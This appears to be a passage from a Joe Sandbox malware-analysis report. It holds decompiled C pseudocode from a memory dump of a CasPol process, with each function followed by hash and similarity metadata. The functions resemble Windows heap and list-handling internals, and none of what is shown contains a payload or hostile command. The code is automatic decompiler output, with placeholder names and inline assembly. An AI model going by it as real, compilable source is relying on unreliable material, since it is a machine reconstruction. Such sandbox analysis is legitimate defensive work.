                                                                					if(_t32 != 0) {
                                                                						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                                						E016376E2( *_t40);
                                                                					}
                                                                					 *_t40 = _t29;
                                                                					goto L7;
                                                                				}
                                                                				_t40 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                                				if(_t40 == 0) {
                                                                					_t37 = 0xc0000017;
                                                                					goto L7;
                                                                				}
                                                                				_t35 = _v8;
                                                                				 *_t40 = 0;
                                                                				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                                				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                                				goto L3;
                                                                			}











                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                • Instruction ID: 9bf3194a4b234d63a4cb0b9d038d45809ee19c26fc15db620a2e28a53a90e14a
                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                • Instruction Fuzzy Hash: 5F217972600A45EBD771CF0DCA40E66F7E5EB94A10F2485AEE94987B11D731AC01DB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 80%
                                                                			E0163841F(signed int __ecx) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed int _t43;
                                                                				signed int _t46;
                                                                				signed int _t50;
                                                                				signed int _t57;
                                                                				signed int _t64;
                                                                
                                                                				_v16 = __ecx;
                                                                				_t43 =  *0x7ffe0004;
                                                                				_v8 = _t43;
                                                                				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
                                                                				_v12 = 0x7ffe0014;
                                                                				if(_t43 < 0x1000000) {
                                                                					while(1) {
                                                                						_t46 =  *0x7ffe0324;
                                                                						_t50 =  *0x7FFE0320;
                                                                						if(_t46 ==  *0x7FFE0328) {
                                                                							break;
                                                                						}
                                                                						asm("pause");
                                                                					}
                                                                					_t57 = _v12;
                                                                					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
                                                                				} else {
                                                                					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
                                                                				}
                                                                				_push(0);
                                                                				_push( &_v24);
                                                                				E01669810();
                                                                				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
                                                                			}














                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                • Instruction ID: 9dcd770ecac9a9ec1d39332f63975639fc67cf47642c98b03b2879ff84cc7076
                                                                • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                • Instruction Fuzzy Hash: 12219076E00119CBCB14CFA9C98069AF3F9FB88350F664565ED18B7340C630AE05CBD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 54%
                                                                			E0165B390(void* __ecx, intOrPtr _a4) {
                                                                				signed int _v8;
                                                                				signed char _t12;
                                                                				signed int _t16;
                                                                				signed int _t21;
                                                                				void* _t28;
                                                                				signed int _t30;
                                                                				signed int _t36;
                                                                				signed int _t41;
                                                                
                                                                				_push(__ecx);
                                                                				_t41 = _a4 + 0xffffffb8;
                                                                				E01642280(_t12, 0x1718608);
                                                                				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                                				asm("sbb edi, edi");
                                                                				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                				_v8 = _t36;
                                                                				asm("lock cmpxchg [ebx], ecx");
                                                                				_t30 = 1;
                                                                				if(1 != 1) {
                                                                					while(1) {
                                                                						_t21 = _t30 & 0x00000006;
                                                                						_t16 = _t30;
                                                                						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                						asm("lock cmpxchg [edi], esi");
                                                                						if(_t16 == _t30) {
                                                                							break;
                                                                						}
                                                                						_t30 = _t16;
                                                                					}
                                                                					_t36 = _v8;
                                                                					if(_t21 == 2) {
                                                                						_t16 = E016600C2(0x1718608, 0, _t28);
                                                                					}
                                                                				}
                                                                				if(_t36 != 0) {
                                                                					_t16 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                				}
                                                                				return _t16;
                                                                			}












                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2df282e53eda6adf630ec4de61dfd4526240a4aee38fa579714c1dc1cdbbb554
                                                                • Instruction ID: 6e39cf737a80058f1e54a8741f40a2a1a2297341011b54e50f95fd5a0b7c1026
                                                                • Opcode Fuzzy Hash: 2df282e53eda6adf630ec4de61dfd4526240a4aee38fa579714c1dc1cdbbb554
                                                                • Instruction Fuzzy Hash: 3B1166333051209FCB29CA589D81A2BB29BEBC5770F38413DEE26D7381CA31AC02C695
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 77%
                                                                			E01629240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                				intOrPtr _t33;
                                                                				intOrPtr _t37;
                                                                				intOrPtr _t41;
                                                                				intOrPtr* _t46;
                                                                				void* _t48;
                                                                				intOrPtr _t50;
                                                                				intOrPtr* _t60;
                                                                				void* _t61;
                                                                				intOrPtr _t62;
                                                                				intOrPtr _t65;
                                                                				void* _t66;
                                                                				void* _t68;
                                                                
                                                                				_push(0xc);
                                                                				_push(0x16ff708);
                                                                				E0167D08C(__ebx, __edi, __esi);
                                                                				_t65 = __ecx;
                                                                				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                				if( *(__ecx + 0x24) != 0) {
                                                                					_push( *(__ecx + 0x24));
                                                                					E016695D0();
                                                                					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                				}
                                                                				L6();
                                                                				L6();
                                                                				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                				E016695D0();
                                                                				_t33 =  *0x17184c4; // 0x0
                                                                				L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                				_t37 =  *0x17184c4; // 0x0
                                                                				L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                				_t41 =  *0x17184c4; // 0x0
                                                                				E01642280(L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x17186b4);
                                                                				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                				_t46 = _t65 + 0xe8;
                                                                				_t62 =  *_t46;
                                                                				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                					_t61 = 3;
                                                                					asm("int 0x29");
                                                                					_push(_t65);
                                                                					_t66 = _t61;
                                                                					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                					_push( *_t23);
                                                                					E016695D0();
                                                                					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                					_push( *_t24);
                                                                					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                					_t48 = E016695D0();
                                                                					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                					return _t48;
                                                                				} else {
                                                                					 *_t60 = _t62;
                                                                					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                					 *(_t68 - 4) = 0xfffffffe;
                                                                					E01629325();
                                                                					_t50 =  *0x17184c4; // 0x0
                                                                					return E0167D0D1(L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                				}
                                                                			}
















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 76a3671a6aa4d3a2777028174f5dd635f1d0961dcc2318dbd73e7d6607306ed2
                                                                • Instruction ID: 6270b9850aecfa586cdad718f01601a539740ba811019901f6caea484f3d1e58
                                                                • Opcode Fuzzy Hash: 76a3671a6aa4d3a2777028174f5dd635f1d0961dcc2318dbd73e7d6607306ed2
                                                                • Instruction Fuzzy Hash: D3213972151A11DFC722EF68CE40F5AB7BABF18718F14496CE149866A2CB34E941CF88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 90%
                                                                			E016B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                				intOrPtr* _t18;
                                                                				intOrPtr _t24;
                                                                				intOrPtr* _t27;
                                                                				intOrPtr* _t30;
                                                                				intOrPtr* _t31;
                                                                				intOrPtr _t33;
                                                                				intOrPtr* _t34;
                                                                				intOrPtr* _t35;
                                                                				void* _t37;
                                                                				void* _t38;
                                                                				void* _t39;
                                                                				void* _t43;
                                                                
                                                                				_t39 = __eflags;
                                                                				_t35 = __edi;
                                                                				_push(8);
                                                                				_push(0x17008d0);
                                                                				E0167D08C(__ebx, __edi, __esi);
                                                                				_t37 = __ecx;
                                                                				E016B41E8(__ebx, __edi, __ecx, _t39);
                                                                				E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                				_t18 = _t37 + 8;
                                                                				_t33 =  *_t18;
                                                                				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                					L8:
                                                                					_push(3);
                                                                					asm("int 0x29");
                                                                				} else {
                                                                					 *_t27 = _t33;
                                                                					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                					_t35 = 0x17187e4;
                                                                					_t18 =  *0x17187e0; // 0x0
                                                                					while(_t18 != 0) {
                                                                						_t43 = _t18 -  *0x1715cd0; // 0xffffffff
                                                                						if(_t43 >= 0) {
                                                                							_t31 =  *0x17187e4; // 0x0
                                                                							_t18 =  *_t31;
                                                                							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                								goto L8;
                                                                							} else {
                                                                								 *0x17187e4 = _t18;
                                                                								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                								L01627055(_t31 + 0xfffffff8);
                                                                								_t24 =  *0x17187e0; // 0x0
                                                                								_t18 = _t24 - 1;
                                                                								 *0x17187e0 = _t18;
                                                                								continue;
                                                                							}
                                                                						}
                                                                						goto L9;
                                                                					}
                                                                				}
                                                                				L9:
                                                                				__eflags =  *0x1715cd0;
                                                                				if( *0x1715cd0 <= 0) {
                                                                					L01627055(_t37);
                                                                				} else {
                                                                					_t30 = _t37 + 8;
                                                                					_t34 =  *0x17187e8; // 0x0
                                                                					__eflags =  *_t34 - _t35;
                                                                					if( *_t34 != _t35) {
                                                                						goto L8;
                                                                					} else {
                                                                						 *_t30 = _t35;
                                                                						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                						 *_t34 = _t30;
                                                                						 *0x17187e8 = _t30;
                                                                						 *0x17187e0 = _t18 + 1;
                                                                					}
                                                                				}
                                                                				 *(_t38 - 4) = 0xfffffffe;
                                                                				return E0167D0D1(L016B4320());
                                                                			}
















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2fbd78c8ed5d21a5a6a3323ec73d3232ac2f17e58c3816b036e0550d44e6e91f
                                                                • Instruction ID: e8108ed256d05ae470838be4ee146178fd001fd1f636b4bd906fbdbd66aa0892
                                                                • Opcode Fuzzy Hash: 2fbd78c8ed5d21a5a6a3323ec73d3232ac2f17e58c3816b036e0550d44e6e91f
                                                                • Instruction Fuzzy Hash: E5219D70941602CFC726DFACD880A94BBF1FF85364B14C26EC1569B39ADB31C492CB45
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 34%
                                                                			E01652397(intOrPtr _a4) {
                                                                				void* __ebx;
                                                                				void* __ecx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				signed int _t11;
                                                                				void* _t19;
                                                                				void* _t25;
                                                                				void* _t26;
                                                                				intOrPtr _t27;
                                                                				void* _t28;
                                                                				void* _t29;
                                                                
                                                                				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                                				if( *0x171848c != 0) {
                                                                					L0164FAD0(0x1718610);
                                                                					if( *0x171848c == 0) {
                                                                						E0164FA00(0x1718610, _t19, _t27, 0x1718610);
                                                                						goto L1;
                                                                					} else {
                                                                						_push(0);
                                                                						_push(_a4);
                                                                						_t26 = 4;
                                                                						_t29 = E01652581(0x1718610, 0x16050a0, _t26, _t27, _t28);
                                                                						E0164FA00(0x1718610, 0x16050a0, _t27, 0x1718610);
                                                                					}
                                                                				} else {
                                                                					L1:
                                                                					_t11 =  *0x1718614; // 0x0
                                                                					if(_t11 == 0) {
                                                                						_t11 = E01664886(0x1601088, 1, 0x1718614);
                                                                					}
                                                                					_push(0);
                                                                					_push(_a4);
                                                                					_t25 = 4;
                                                                					_t29 = E01652581(0x1718610, (_t11 << 4) + 0x1605070, _t25, _t27, _t28);
                                                                				}
                                                                				if(_t29 != 0) {
                                                                					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                                					 *((char*)(_t29 + 0x40)) = 0;
                                                                				}
                                                                				return _t29;
                                                                			}
















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5ee4412a7242a72ee14fadff313c455659615fc81540ced15315a99075306195
                                                                • Instruction ID: 85554dc298efbfb6d7f2d6238d74747c367693261ddeeade22ce2a027b3120f9
                                                                • Opcode Fuzzy Hash: 5ee4412a7242a72ee14fadff313c455659615fc81540ced15315a99075306195
                                                                • Instruction Fuzzy Hash: 0F112B31744301EBE7759A2DEC90B16B79EBBA0720F14842EFE0397282CAB0D841C759
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 93%
                                                                			E016A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                                				signed short* _v8;
                                                                				unsigned int _v12;
                                                                				intOrPtr _v16;
                                                                				signed int _t22;
                                                                				signed char _t23;
                                                                				short _t32;
                                                                				void* _t38;
                                                                				char* _t40;
                                                                
                                                                				_v12 = __edx;
                                                                				_t29 = 0;
                                                                				_v8 = __ecx;
                                                                				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                                				_t38 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                                				if(_t38 != 0) {
                                                                					_t40 = _a4;
                                                                					 *_t40 = 1;
                                                                					E0166F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                                					_t22 = _v12 >> 1;
                                                                					_t32 = 0x2e;
                                                                					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                                					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                                					_t23 = E0165D268(_t38, 1);
                                                                					asm("sbb al, al");
                                                                					 *_t40 =  ~_t23 + 1;
                                                                					L016477F0(_v16, 0, _t38);
                                                                				} else {
                                                                					 *_a4 = 0;
                                                                					_t29 = 0xc0000017;
                                                                				}
                                                                				return _t29;
                                                                			}












                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                • Instruction ID: 2df4613deda7c91145dafb9996a29ca7ba692a0d9ea299496493a51dbfdea224
                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                • Instruction Fuzzy Hash: 6A11C272504208BBC7059F5C9C809BEBBBAEF95310F1080AEF94487351DE318D55D7A9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 42%
                                                                			E0162C962(char __ecx) {
                                                                				signed int _v8;
                                                                				intOrPtr _v12;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				intOrPtr _t19;
                                                                				char _t22;
                                                                				intOrPtr _t26;
                                                                				intOrPtr _t27;
                                                                				char _t32;
                                                                				char _t34;
                                                                				intOrPtr _t35;
                                                                				intOrPtr _t37;
                                                                				intOrPtr* _t38;
                                                                				signed int _t39;
                                                                
                                                                				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                				_v8 =  *0x171d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                				_t34 = __ecx;
                                                                				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                					_t26 = 0;
                                                                					E0163EEF0(0x17170a0);
                                                                					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                					if(E016AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                						L9:
                                                                						E0163EB70(_t29, 0x17170a0);
                                                                						_t19 = _t26;
                                                                						L2:
                                                                						_pop(_t35);
                                                                						_pop(_t37);
                                                                						_pop(_t27);
                                                                						return E0166B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                					}
                                                                					_t29 = _t34;
                                                                					_t26 = E016AF1FC(_t34, _t32);
                                                                					if(_t26 < 0) {
                                                                						goto L9;
                                                                					}
                                                                					_t38 =  *0x17170c0; // 0x0
                                                                					while(_t38 != 0x17170c0) {
                                                                						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                						_t38 =  *_t38;
                                                                						_v12 = _t22;
                                                                						if(_t22 != 0) {
                                                                							_t29 = _t22;
                                                                							 *0x171b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                							_v12();
                                                                						}
                                                                					}
                                                                					goto L9;
                                                                				}
                                                                				_t19 = 0;
                                                                				goto L2;
                                                                			}



















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ff9dc683e9c749af219801592709f459e22725ebf72ed5731f491e966917f781
                                                                • Instruction ID: ca038bbac63207406f386284597b5e01ef4beda5fa82e6d73c27b2e2c7431c59
                                                                • Opcode Fuzzy Hash: ff9dc683e9c749af219801592709f459e22725ebf72ed5731f491e966917f781
                                                                • Instruction Fuzzy Hash: E9112131320746DFCB25AF2CDC85A2BB7EABF84610B00052CE84193650DB20EC00CBE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 87%
                                                                			E016637F5(void* __ecx, intOrPtr* __edx) {
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				signed char _t6;
                                                                				intOrPtr _t13;
                                                                				intOrPtr* _t20;
                                                                				intOrPtr* _t27;
                                                                				void* _t28;
                                                                				intOrPtr* _t29;
                                                                
                                                                				_t27 = __edx;
                                                                				_t28 = __ecx;
                                                                				if(__edx == 0) {
                                                                					E01642280(_t6, 0x1718550);
                                                                				}
                                                                				_t29 = E0166387E(_t28);
                                                                				if(_t29 == 0) {
                                                                					L6:
                                                                					if(_t27 == 0) {
                                                                						E0163FFB0(0x1718550, _t27, 0x1718550);
                                                                					}
                                                                					if(_t29 == 0) {
                                                                						return 0xc0000225;
                                                                					} else {
                                                                						if(_t27 != 0) {
                                                                							goto L14;
                                                                						}
                                                                						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                                						goto L11;
                                                                					}
                                                                				} else {
                                                                					_t13 =  *_t29;
                                                                					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                                						L13:
                                                                						_push(3);
                                                                						asm("int 0x29");
                                                                						L14:
                                                                						 *_t27 = _t29;
                                                                						L11:
                                                                						return 0;
                                                                					}
                                                                					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                                					if( *_t20 != _t29) {
                                                                						goto L13;
                                                                					}
                                                                					 *_t20 = _t13;
                                                                					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                                					asm("btr eax, ecx");
                                                                					goto L6;
                                                                				}
                                                                			}












                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b5d8327b9622387fe42d3b23e545666987b1e90b7d8347b7493b2f990777370
                                                                • Instruction ID: 9ad18dd85cb4c8726896937f1674fbb505c70869e8ee68bf1c8e5f986a01dca9
                                                                • Opcode Fuzzy Hash: 1b5d8327b9622387fe42d3b23e545666987b1e90b7d8347b7493b2f990777370
                                                                • Instruction Fuzzy Hash: B8018472A056119BC3378A1E9D40A6ABBBEFF86A60717446DE94D8B315D730D801C7D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0165002D() {
                                                                				void* _t11;
                                                                				char* _t14;
                                                                				signed char* _t16;
                                                                				char* _t27;
                                                                				signed char* _t29;
                                                                
                                                                				_t11 = E01647D50();
                                                                				_t27 = 0x7ffe0384;
                                                                				if(_t11 != 0) {
                                                                					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                				} else {
                                                                					_t14 = 0x7ffe0384;
                                                                				}
                                                                				_t29 = 0x7ffe0385;
                                                                				if( *_t14 != 0) {
                                                                					if(E01647D50() == 0) {
                                                                						_t16 = 0x7ffe0385;
                                                                					} else {
                                                                						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                					}
                                                                					if(( *_t16 & 0x00000040) != 0) {
                                                                						goto L18;
                                                                					} else {
                                                                						goto L3;
                                                                					}
                                                                				} else {
                                                                					L3:
                                                                					if(E01647D50() != 0) {
                                                                						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                					}
                                                                					if( *_t27 != 0) {
                                                                						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                                							goto L5;
                                                                						}
                                                                						if(E01647D50() != 0) {
                                                                							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                						}
                                                                						if(( *_t29 & 0x00000020) == 0) {
                                                                							goto L5;
                                                                						}
                                                                						L18:
                                                                						return 1;
                                                                					} else {
                                                                						L5:
                                                                						return 0;
                                                                					}
                                                                				}
                                                                			}









                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                • Instruction ID: 3f5b3b74347dbc1d736d5dc71e03aed8211d0b583b1bbc9d72ac18f82961b0d5
                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                • Instruction Fuzzy Hash: 0F11C4336156818FEB239B2CDE54B357BD9EF41794F0900A0ED4487796DB29D843C664
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 94%
                                                                			E0163766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                				char _v8;
                                                                				void* _t22;
                                                                				void* _t24;
                                                                				intOrPtr _t29;
                                                                				intOrPtr* _t30;
                                                                				void* _t42;
                                                                				intOrPtr _t47;
                                                                
                                                                				_push(__ecx);
                                                                				_t36 =  &_v8;
                                                                				if(E0165F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                                					L10:
                                                                					_t22 = 0;
                                                                				} else {
                                                                					_t24 = _v8 + __ecx;
                                                                					_t42 = _t24;
                                                                					if(_t24 < __ecx) {
                                                                						goto L10;
                                                                					} else {
                                                                						if(E0165F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                                							goto L10;
                                                                						} else {
                                                                							_t29 = _v8 + _t42;
                                                                							if(_t29 < _t42) {
                                                                								goto L10;
                                                                							} else {
                                                                								_t47 = _t29;
                                                                								_t30 = _a16;
                                                                								if(_t30 != 0) {
                                                                									 *_t30 = _t47;
                                                                								}
                                                                								if(_t47 == 0) {
                                                                									goto L10;
                                                                								} else {
                                                                									_t22 = L01644620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t22;
                                                                			}











                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                • Instruction ID: e127aa26c03b15ada093239d5d71fd6688624aa74dfedcbf72331828c4f73850
                                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                • Instruction Fuzzy Hash: 12018872700129ABD7209E5ECC51E5B7BADEFC5660F240564BA08CB250DA30DD0197A4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 69%
                                                                			E01629080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                				intOrPtr* _t51;
                                                                				intOrPtr _t59;
                                                                				signed int _t64;
                                                                				signed int _t67;
                                                                				signed int* _t71;
                                                                				signed int _t74;
                                                                				signed int _t77;
                                                                				signed int _t82;
                                                                				intOrPtr* _t84;
                                                                				void* _t85;
                                                                				intOrPtr* _t87;
                                                                				void* _t94;
                                                                				signed int _t95;
                                                                				intOrPtr* _t97;
                                                                				signed int _t99;
                                                                				signed int _t102;
                                                                				void* _t104;
                                                                
                                                                				_push(__ebx);
                                                                				_push(__esi);
                                                                				_push(__edi);
                                                                				_t97 = __ecx;
                                                                				_t102 =  *(__ecx + 0x14);
                                                                				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                					_t102 = _t102 | 0x000007d0;
                                                                				}
                                                                				_t48 =  *[fs:0x30];
                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                					_t102 = _t102 & 0xff000000;
                                                                				}
                                                                				_t80 = 0x17185ec;
                                                                				E01642280(_t48, 0x17185ec);
                                                                				_t51 =  *_t97 + 8;
